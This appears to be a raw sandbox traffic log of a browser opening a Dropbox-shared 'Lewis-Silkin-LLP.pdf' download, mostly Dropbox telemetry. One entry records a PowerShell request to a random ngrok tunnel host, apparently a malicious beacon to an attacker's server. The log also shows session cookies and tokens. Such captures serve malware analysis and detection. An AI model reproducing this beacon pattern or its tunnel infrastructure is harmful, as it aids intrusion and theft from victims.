X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Xss-Protection: 1; mode=block Date: Thu, 19 Dec 2024 12:44:51 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains Strict-Transport-Security: max-age=31536000; includeSubDomains Cache-Control: no-cache, no-store Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 28a940ca924446bf8034b9aa7e5cbf16 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:52 UTC	1050	OUT	POST /2/udcl/log_timing HTTP/1.1 Host: www.dropbox.com Connection: keep-alive Content-Length: 2941 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" X-CSRF-Token: HdS8vQAOgoo2pdq3Kdn8X0eJ X-Dropbox-Uid: -1 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: application/json x-dropbox-client-yaps-attribution: edison_atlasservlet.file_viewer-edison:prod sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.dropbox.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: same-origin Sec-Fetch-Dest: empty Referer: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; t=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-ss=0FAEIkEix0; locale=en_GB
2024-12-19 12:44:52 UTC	2941	OUT	Data Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 5d 2c 22 6d 65 61 73 75 72 65 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 6d 65 61 73 75 72 65 22 2c 22 6e 61 6d 65 22 3a 22 6d 61 66 2e 65 76 65 6e 74 5f 70 6c 75 67 69 6e 2e 74 69 6d 65 5f 74 6f 5f 61 66 74 65 72 5f 64 69 73 70 6c 61 79 22 2c 22 69 64 22 3a 22 35 32 61 36 63 66 36 30 2d 61 62 65 63 2d 34 34 39 61 2d 62 62 65 33 2d 30 30 39 64 32 64 32 61 30 65 31 65 22 2c 22 64 65 74 61 69 6c 22 3a 22 7b 5c 22 65 76 65 6e 74 5f 74 79 70 65 5c 22 3a 5c 22 41 66 74 65 72 44 69 73 70 6c 61 79 5c 22 2c 5c 22 72 6f 75 74 65 5f 6e 61 6d 65 5c 22 3a 5c 22 73 68 61 72 65 64 5f 63 6f 6e 74 65 6e 74 5f 6c 69 6e 6b 3a 66 69 6c 65 3a 73 68 61 72 65 64 5f 6c 69 6e 6b 5f 67 65 6e 65 72 69 63 5f 65 72 72 6f 72 5c 22 2c 5c 22 61 74 6c 61 73 Data Ascii: {"events":[],"measures":[{"type":"measure","name":"maf.event_plugin.time_to_after_display","id":"52a6cf60-abec-449a-bbe3-009d2d2a0e1e","detail":"{\"event_type\":\"AfterDisplay\",\"route_name\":\"shared_content_link:file:shared_link_generic_error\",\"atlas
2024-12-19 12:44:53 UTC	571	IN	HTTP/1.1 200 OK Content-Disposition: attachment Content-Security-Policy: sandbox Content-Type: application/json Pragma: no-cache X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Server-Response-Time: 225 X-Webkit-Csp: sandbox Content-Length: 51 Date: Thu, 19 Dec 2024 12:44:53 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 29ebb9d3f0b44d25a1494e9b976d9557 Connection: close
2024-12-19 12:44:53 UTC	51	IN	Data Raw: 7b 22 6d 73 67 22 3a 22 4d 65 61 73 75 72 65 73 20 70 72 6f 63 65 73 73 65 64 3a 20 35 20 45 76 65 6e 74 73 20 70 72 6f 63 65 73 73 65 64 3a 20 30 22 7d Data Ascii: {"msg":"Measures processed: 5 Events processed: 0"}

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:53 UTC	221	OUT	GET /metadata/7430a49b4ec2f1c77488485c5e23d0dd HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizza Connection: Keep-Alive
2024-12-19 12:44:54 UTC	213	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Content-Length: 207 Content-Type: text/html; charset=utf-8 Date: Thu, 19 Dec 2024 12:44:54 GMT Server: Werkzeug/3.0.3 Python/3.12.8 Connection: close
2024-12-19 12:44:54 UTC	207	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:54 UTC	1998	OUT	POST /web-grpc/edison/web_platform.WebPlatformEdisonFetch/EdisonTopMenuFetch HTTP/1.1 Host: www.dropbox.com Connection: keep-alive Content-Length: 229 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" x-csrf-token: HdS8vQAOgoo2pdq3Kdn8X0eJ accept-language: en_GB x-edison-prompt-controller: shared_content_link x-edison-atlasservlet: file_viewer x-grpc-web: 1 x-dropbox-client-yaps-attribution: edison_atlasservlet.file_viewer-edison:prod sec-ch-ua-platform: "Windows" x-dropbox-browser-id: e9658a9f57f3c5724f210eb89ada3fa6 x-user-agent: @bufbuild/connect-web x-dropbox-authority: www.dropbox.com x-edison-page-name: scl_oboe_file sec-ch-ua-mobile: ?0 x-edison-prompt-action: shared_content_link_view_file_and_folder User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 content-type: application/grpc-web+proto x-edison-original-url: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept: / Origin: https://www.dropbox.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept-Encoding: gzip, deflate, br Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; t=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-ss=0FAEIkEix0; locale=en_GB; __Host-logged-out-session=ChDPre50SfwbRtRglYkX1GzyEMOqkLsGGi5BTHlHQjJPRFBFZ0c5bEJMajJFVnBERE5URnVUQUJrdGRJMTZxUGM2TUVSb0pR; __Secure-dbx_consent={"consentType":1,"consentDate":"2024-12-19T12:44:52.324Z","expireDate":"2025-06-19T11:44:52.324Z","consentMonths":6,"categories":{"strictly necessary":true,"general marketing and advertising":true,"analytics":true,"performance and functionality":true,"social media advertising":true},"userInteracted":false,"numDots":1}
2024-12-19 12:44:54 UTC	229	OUT	Data Raw: 00 00 00 00 e0 52 6e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 64 67 69 75 72 36 34 76 61 77 6d 64 78 39 61 6c 71 77 36 65 74 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 6b 64 75 68 71 72 6e 70 30 30 72 6a 34 34 72 6a 65 70 70 75 77 33 31 71 6b 26 64 6c 3d 31 5a 6e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 64 67 69 75 72 36 34 76 61 77 6d 64 78 39 61 6c 71 77 36 65 74 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 6b 64 75 68 71 72 6e 70 30 30 72 6a 34 34 72 6a 65 70 70 75 77 33 31 71 6b 26 64 6c 3d 31 Data Ascii: Rnhttps://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1Znhttps://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1
2024-12-19 12:44:55 UTC	465	IN	HTTP/1.1 200 OK Content-Type: application/grpc-web+proto Grpc-Accept-Encoding: identity, deflate, gzip Date: Thu, 19 Dec 2024 12:44:54 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains Strict-Transport-Security: max-age=31536000; includeSubDomains Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 3a722a17b1a741b79a2648f4a56e1089 Connection: close Transfer-Encoding: chunked
2024-12-19 12:44:55 UTC	1259	IN	Data Raw: 34 63 35 0d 0a 00 00 00 04 c0 0a bd 09 7b 22 75 73 65 72 49 64 22 3a 20 6e 75 6c 6c 2c 20 22 68 69 64 65 49 6e 73 74 61 6c 6c 4c 69 6e 6b 22 3a 20 66 61 6c 73 65 2c 20 22 6d 6f 62 69 6c 65 55 73 65 41 70 70 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 64 6c 2f 68 6f 6d 65 2f 6d 6f 62 69 6c 65 3f 61 64 67 72 6f 75 70 3d 68 65 61 64 65 72 5c 75 30 30 32 36 63 61 6d 70 61 69 67 6e 3d 6d 6f 77 65 62 5f 62 75 74 74 6f 6e 5c 75 30 30 32 36 63 72 65 61 74 69 76 65 3d 75 73 65 5f 61 70 70 5c 75 30 30 32 36 6d 6f 62 69 6c 65 5f 61 70 70 5f 66 61 6c 6c 62 61 63 6b 3d 5c 75 30 30 32 36 73 72 63 3d 6d 6f 62 69 6c 65 2d 77 65 62 2d 6c 6f 67 67 65 64 2d 69 6e 22 2c 20 22 73 68 6f 75 6c 64 53 68 6f 77 41 64 6d 69 6e 54 61 Data Ascii: 4c5{"userId": null, "hideInstallLink": false, "mobileUseAppUrl": "https://www.dropbox.com/dl/home/mobile?adgroup=header\u0026campaign=moweb_button\u0026creative=use_app\u0026mobile_app_fallback=\u0026src=mobile-web-logged-in", "shouldShowAdminTa

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:55 UTC	1516	OUT	POST /2/udcl/log_timing HTTP/1.1 Host: www.dropbox.com Connection: keep-alive Content-Length: 3360 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" X-CSRF-Token: HdS8vQAOgoo2pdq3Kdn8X0eJ X-Dropbox-Uid: -1 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: application/json x-dropbox-client-yaps-attribution: edison_atlasservlet.file_viewer-edison:prod sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.dropbox.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: same-origin Sec-Fetch-Dest: empty Referer: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; t=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-ss=0FAEIkEix0; locale=en_GB; __Host-logged-out-session=ChDPre50SfwbRtRglYkX1GzyEMOqkLsGGi5BTHlHQjJPRFBFZ0c5bEJMajJFVnBERE5URnVUQUJrdGRJMTZxUGM2TUVSb0pR; __Secure-dbx_consent={"consentType":1,"consentDate":"2024-12-19T12:44:52.324Z","expireDate":"2025-06-19T11:44:52.324Z","consentMonths":6,"categories":{"strictly necessary":true,"general marketing and advertising":true,"analytics":true,"performance and functionality":true,"social media advertising":true},"userInteracted":false,"numDots":1}
2024-12-19 12:44:55 UTC	3360	OUT	Data Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 2c 22 6e 61 6d 65 22 3a 22 65 78 70 6f 73 75 72 65 2e 73 74 6f 72 6d 63 72 6f 77 2e 65 78 70 65 72 69 6d 65 6e 74 61 74 69 6f 6e 22 2c 22 69 64 22 3a 22 61 39 30 35 61 39 35 33 2d 39 39 36 34 2d 34 38 32 39 2d 61 34 61 65 2d 34 33 63 33 37 62 37 62 66 32 38 36 22 2c 22 64 65 74 61 69 6c 22 3a 22 7b 5c 22 66 65 61 74 75 72 65 5c 22 3a 5c 22 70 72 69 76 61 63 79 5f 63 6f 6e 73 65 6e 74 5f 6e 6f 5f 69 66 72 61 6d 65 5c 22 2c 5c 22 65 78 70 65 72 69 6d 65 6e 74 56 61 72 69 61 6e 74 5c 22 3a 5c 22 56 32 5c 22 2c 5c 22 70 6f 70 75 6c 61 74 69 6f 6e 49 64 5c 22 3a 5c 22 33 30 5c 22 2c 5c 22 73 74 6f 72 6d 63 72 6f 77 4d 65 74 61 64 61 74 61 4a 73 6f 6e 5c 22 3a 5c 22 7b 5c 5c 5c 22 76 Data Ascii: {"events":[{"type":"event","name":"exposure.stormcrow.experimentation","id":"a905a953-9964-4829-a4ae-43c37b7bf286","detail":"{\"feature\":\"privacy_consent_no_iframe\",\"experimentVariant\":\"V2\",\"populationId\":\"30\",\"stormcrowMetadataJson\":\"{\\\"v
2024-12-19 12:44:56 UTC	571	IN	HTTP/1.1 200 OK Content-Disposition: attachment Content-Security-Policy: sandbox Content-Type: application/json Pragma: no-cache X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Server-Response-Time: 130 X-Webkit-Csp: sandbox Content-Length: 51 Date: Thu, 19 Dec 2024 12:44:56 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: cd86a0cf9a8748b786852b016c679640 Connection: close
2024-12-19 12:44:56 UTC	51	IN	Data Raw: 7b 22 6d 73 67 22 3a 22 4d 65 61 73 75 72 65 73 20 70 72 6f 63 65 73 73 65 64 3a 20 31 20 45 76 65 6e 74 73 20 70 72 6f 63 65 73 73 65 64 3a 20 34 22 7d Data Ascii: {"msg":"Measures processed: 1 Events processed: 4"}

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:59 UTC	1529	OUT	POST /2/pap_event_logging/log_events HTTP/1.1 Host: www.dropbox.com Connection: keep-alive Content-Length: 1710 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" X-CSRF-Token: HdS8vQAOgoo2pdq3Kdn8X0eJ X-Dropbox-Uid: -1 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: application/json x-dropbox-client-yaps-attribution: edison_atlasservlet.file_viewer-edison:prod sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.dropbox.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: same-origin Sec-Fetch-Dest: empty Referer: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; t=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-ss=0FAEIkEix0; locale=en_GB; __Host-logged-out-session=ChDPre50SfwbRtRglYkX1GzyEMOqkLsGGi5BTHlHQjJPRFBFZ0c5bEJMajJFVnBERE5URnVUQUJrdGRJMTZxUGM2TUVSb0pR; __Secure-dbx_consent={"consentType":1,"consentDate":"2024-12-19T12:44:52.324Z","expireDate":"2025-06-19T11:44:52.324Z","consentMonths":6,"categories":{"strictly necessary":true,"general marketing and advertising":true,"analytics":true,"performance and functionality":true,"social media advertising":true},"userInteracted":false,"numDots":1}
2024-12-19 12:44:59 UTC	1710	OUT	Data Raw: 7b 22 65 76 65 6e 74 5f 65 6e 74 72 69 65 73 22 3a 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 5f 66 69 65 6c 64 73 22 3a 7b 22 62 75 69 6c 64 5f 63 68 61 6e 6e 65 6c 22 3a 7b 22 2e 74 61 67 22 3a 22 73 74 61 62 6c 65 22 7d 2c 22 70 72 6f 64 75 63 74 5f 6e 61 6d 65 22 3a 7b 22 2e 74 61 67 22 3a 22 63 6f 72 65 5f 64 72 6f 70 62 6f 78 22 7d 7d 2c 22 64 65 76 69 63 65 5f 66 69 65 6c 64 73 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 70 6c 61 74 66 6f 72 6d 5f 66 69 65 6c 64 73 22 3a 7b 22 2e 74 61 67 22 3a 22 63 6c 69 65 6e 74 5f 77 65 62 5f 64 65 76 69 63 65 5f 66 69 65 6c 64 73 22 2c 22 75 61 5f 62 72 6f 77 73 65 72 5f 6c 61 6e 67 22 3a 22 65 6e 2d 47 42 22 2c 22 69 73 5f 62 72 5f 63 6f 6f 6b 69 65 73 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 Data Ascii: {"event_entries":{"application_fields":{"build_channel":{".tag":"stable"},"product_name":{".tag":"core_dropbox"}},"device_fields":{"locale":"en-GB","platform_fields":{".tag":"client_web_device_fields","ua_browser_lang":"en-GB","is_br_cookies_enabled":true
2024-12-19 12:45:00 UTC	571	IN	HTTP/1.1 200 OK Content-Disposition: attachment Content-Security-Policy: sandbox Content-Type: application/json Pragma: no-cache X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Frame-Options: sameorigin X-Server-Response-Time: 120 X-Webkit-Csp: sandbox Content-Length: 17 Date: Thu, 19 Dec 2024 12:45:00 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 3b0ba7aa73184704bbacc20ab46393b0 Connection: close
2024-12-19 12:45:00 UTC	17	IN	Data Raw: 7b 22 72 65 73 75 6c 74 22 3a 22 74 72 75 65 22 7d Data Ascii: {"result":"true"}

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:59 UTC	1462	OUT	POST /log/telemetry HTTP/1.1 Host: www.dropbox.com Connection: keep-alive Content-Length: 932 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-Type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 X-Dropbox-Client-Yaps-Attribution: edison_atlasservlet.file_viewer-edison:prod sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.dropbox.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; t=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-ss=0FAEIkEix0; locale=en_GB; __Host-logged-out-session=ChDPre50SfwbRtRglYkX1GzyEMOqkLsGGi5BTHlHQjJPRFBFZ0c5bEJMajJFVnBERE5URnVUQUJrdGRJMTZxUGM2TUVSb0pR; __Secure-dbx_consent={"consentType":1,"consentDate":"2024-12-19T12:44:52.324Z","expireDate":"2025-06-19T11:44:52.324Z","consentMonths":6,"categories":{"strictly necessary":true,"general marketing and advertising":true,"analytics":true,"performance and functionality":true,"social media advertising":true},"userInteracted":false,"numDots":1}
2024-12-19 12:44:59 UTC	932	OUT	Data Raw: 64 61 74 61 2d 76 65 72 73 69 6f 6e 3d 31 26 62 61 74 63 68 65 73 3d 25 37 42 25 32 32 68 69 76 65 25 33 41 77 65 62 2d 6f 72 63 68 65 73 74 72 61 74 69 6f 6e 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 25 32 32 25 33 41 25 32 32 25 35 42 25 37 42 25 35 43 25 32 32 63 61 74 65 67 6f 72 79 25 35 43 25 32 32 25 33 41 25 35 43 25 32 32 77 65 62 2d 6f 72 63 68 65 73 74 72 61 74 69 6f 6e 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 25 35 43 25 32 32 25 32 43 25 35 43 25 32 32 75 73 65 72 5f 69 64 25 35 43 25 32 32 25 33 41 6e 75 6c 6c 25 32 43 25 35 43 25 32 32 73 65 73 73 69 6f 6e 5f 69 64 25 35 43 25 32 32 25 33 41 6e 75 6c 6c 25 32 43 25 35 43 25 32 32 61 63 74 69 6f 6e 25 35 43 25 32 32 25 33 41 6e 75 6c 6c 25 32 43 25 35 43 25 32 32 61 63 74 69 6f 6e 5f 76 61 Data Ascii: data-version=1&batches=%7B%22hive%3Aweb-orchestration_client_events%22%3A%22%5B%7B%5C%22category%5C%22%3A%5C%22web-orchestration_client_events%5C%22%2C%5C%22user_id%5C%22%3Anull%2C%5C%22session_id%5C%22%3Anull%2C%5C%22action%5C%22%3Anull%2C%5C%22action_va
2024-12-19 12:45:00 UTC	2780	IN	HTTP/1.1 204 No Content Content-Type: text/plain; charset=utf-8 Content-Disposition: attachment Content-Security-Policy: base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; default-src 'none' ; font-src https:// data: ; form-action 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-src https://* carousel: dbapi-6 [TRUNCATED] Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic ; script-src 'unsafe-eval' 'strict-dynamic' 'nonce-zae5FOaY4wgYj6/QMIGo' 'nonce-RftBflA1VBBHPll0Vn76' Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Xss-Protection: 1; mode=block Date: Thu, 19 Dec 2024 12:45:00 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains X-Dropbox-Is-Upstream-Batch: true Strict-Transport-Security: max-age=31536000; includeSubDomains Cache-Control: no-cache, no-store Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 3ffd666bb05c48b5a247a3d34013f407 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:45:08 UTC	911	OUT	GET /pageview?ex=&pvt=n&la=en-GB&uc=0&url=https%3A%2F%2Fwww.dropbox.com%2Fscl%2Ffi%2Fdgiur64vawmdx9alqw6et%2FLewis-Silkin-LLP.pdf%3Frlkey%3Dkduhqrnp00rj44rjeppuw31qk%26dl%3D1&dr=&dw=1280&dh=1024&ww=1280&wh=1024&sw=1280&sh=1024&uu=c480ecee-58fe-ab6f-a297-56b61f444401&sn=1&hd=1734612301&v=15.36.2&pid=5416&pn=1&r=352634 HTTP/1.1 Host: c.contentsquare.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.dropbox.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-19 12:45:08 UTC	469	IN	HTTP/1.1 204 No Content Access-Control-Allow-Headers: Access-Control-Expose-Headers, Content-Type, Content-Compression, X-Requested-With Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Origin: * Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Content-Disposition: inline Date: Thu, 19 Dec 2024 12:45:08 GMT Expires: Sun, 24 Oct 1982 23:00:00 GMT Pragma: no-cache Timing-Allow-Origin: * Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:45:08 UTC	1661	OUT	POST /2/udcl/log_timing HTTP/1.1 Host: www.dropbox.com Connection: keep-alive Content-Length: 1543 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" X-CSRF-Token: HdS8vQAOgoo2pdq3Kdn8X0eJ X-Dropbox-Uid: -1 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: application/json x-dropbox-client-yaps-attribution: edison_atlasservlet.file_viewer-edison:prod sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.dropbox.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: same-origin Sec-Fetch-Dest: empty Referer: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; t=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-ss=0FAEIkEix0; locale=en_GB; __Host-logged-out-session=ChDPre50SfwbRtRglYkX1GzyEMOqkLsGGi5BTHlHQjJPRFBFZ0c5bEJMajJFVnBERE5URnVUQUJrdGRJMTZxUGM2TUVSb0pR; __Secure-dbx_consent={"consentType":1,"consentDate":"2024-12-19T12:44:52.324Z","expireDate":"2025-06-19T11:44:52.324Z","consentMonths":6,"categories":{"strictly necessary":true,"general marketing and advertising":true,"analytics":true,"performance and functionality":true,"social media advertising":true},"userInteracted":false,"numDots":1}; _cs_c=0; _cs_id=c480ecee-58fe-ab6f-a297-56b61f444401.1734612301.1.1734612301.1734612301.1724166274.1768776301511.1; _cs_s=1.0.0.9.1734614103044
